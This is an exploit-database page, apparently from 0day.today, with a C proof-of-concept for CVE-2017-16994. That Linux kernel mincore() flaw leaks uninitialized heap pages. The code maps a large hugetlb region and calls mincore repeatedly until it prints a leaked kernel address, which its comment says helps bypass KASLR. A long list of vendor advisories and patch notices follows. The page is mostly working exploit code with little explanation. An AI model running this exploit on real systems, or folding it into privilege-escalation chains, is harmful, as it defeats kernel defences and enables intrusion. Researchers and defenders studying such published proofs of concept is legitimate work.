Lucene search
Anonymous1337DAY-ID-30016HistoryMar 20, 2018 - 12:00 a.m.
Linux Kernel - mincore() Heap Page Disclosure (PoC) Exploit
2018-03-2000:00:00
anonymous
0day.today
41
0.0004 Low
EPSS
Percentile
8.8%
Exploit for linux platform in category dos / poc
/*
* The source is modified from
* https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
* I try to find out infomation useful from the infoleak
* The kernel address can be easily found out from the uninitialized memory
* leaked from kernel, which can help bypass kaslr
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
int main(void) {
unsigned char buf[getpagesize()/sizeof(unsigned char)];
int right = 1;
unsigned long addr = 0;
/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
err(1, "mmap");
while(right){
/* Touch a mishandle with this type mapping */
if (mincore((void*)0x86000000, 0x1000000, buf))
perror("mincore");
for( int n=0; n<getpagesize()/sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space, may need some mask&offset */
if(addr > 0xffffffff00000000){
right = 0;
goto out;
}
}
}
out:
printf("%p\n", addr);
return 0;
}
# 0day.today [2018-04-04] #Related
cve
cve
CVE-2017-16994
2017-11-27 19:29:00
ubuntucve
ubuntucve
CVE-2017-16994
2017-11-27 00:00:00
redhatcve
redhatcve
CVE-2017-16994
2019-10-12 01:30:28
prion
prion
Information disclosure
2017-11-27 19:29:00
zdt
zdt
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Exploit
2018-03-20 00:00:00
debiancve
debiancve
CVE-2017-16994
2017-11-27 19:29:00
seebug
seebug
Linux: mincore() discloses uninitialized kernel heap pages(CVE-2017-16994)
2017-12-04 00:00:00
redhat
redhat
(RHSA-2018:0502) Important: kernel-alt security and bug fix update
2018-03-13 15:15:20
fedora
fedora
[SECURITY] Fedora 25 Update: kernel-4.13.16-100.fc25
2017-12-02 08:03:57
[SECURITY] Fedora 26 Update: kernel-4.13.16-200.fc26
2017-12-01 03:45:23
[SECURITY] Fedora 27 Update: kernel-4.13.16-300.fc27
2017-12-01 09:06:53
openvas
openvas
Fedora Update for kernel FEDORA-2017-905bb449bc
2017-12-04 00:00:00
Fedora Update for kernel FEDORA-2017-92a0ae09aa
2017-12-04 00:00:00
SUSE: Security Advisory (SUSE-SU-2017:3398-1)
2021-04-19 00:00:00
nessus
nessus
Fedora 27 : kernel (2017-92a0ae09aa)
2018-01-15 00:00:00
Fedora 25 : kernel (2017-905bb449bc)
2017-12-04 00:00:00
Fedora 26 : kernel (2017-f9f3d80442)
2017-12-01 00:00:00
oraclelinux
oraclelinux
Unbreakable Enterprise kernel security update
2018-05-15 00:00:00
amazon
amazon
Important: kernel
2017-12-21 00:02:00
suse
suse
Security update for the Linux Kernel (important)
2017-12-21 18:10:22
Security update for the Linux Kernel (important)
2017-12-22 00:07:57
Security update for the Linux Kernel (important)
2017-12-18 12:08:19
photon
photon
Critical Photon OS Security Update - PHSA-2017-0005
2017-12-07 00:00:00
Critical Photon OS Security Update - PHSA-2017-0091
2017-12-08 00:00:00
ubuntu
ubuntu
Linux kernel (Azure) vulnerabilities
2018-04-24 00:00:00
Linux kernel (Raspberry Pi 2) vulnerabilities
2018-04-04 00:00:00
Linux kernel vulnerabilities
2018-04-03 00:00:00
mageia
mageia
Updated kernel-tmb packages fix security vulnerabilities
2017-12-22 13:31:08
Updated kernel-linus packages fix security vulnerabilities
2017-12-22 13:31:08
Updated kernel packages fix security vulnerabilities
2017-12-22 01:14:23
ibm
ibm
cloudfoundry
cloudfoundry
USN-3619-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry
2018-05-02 00:00:00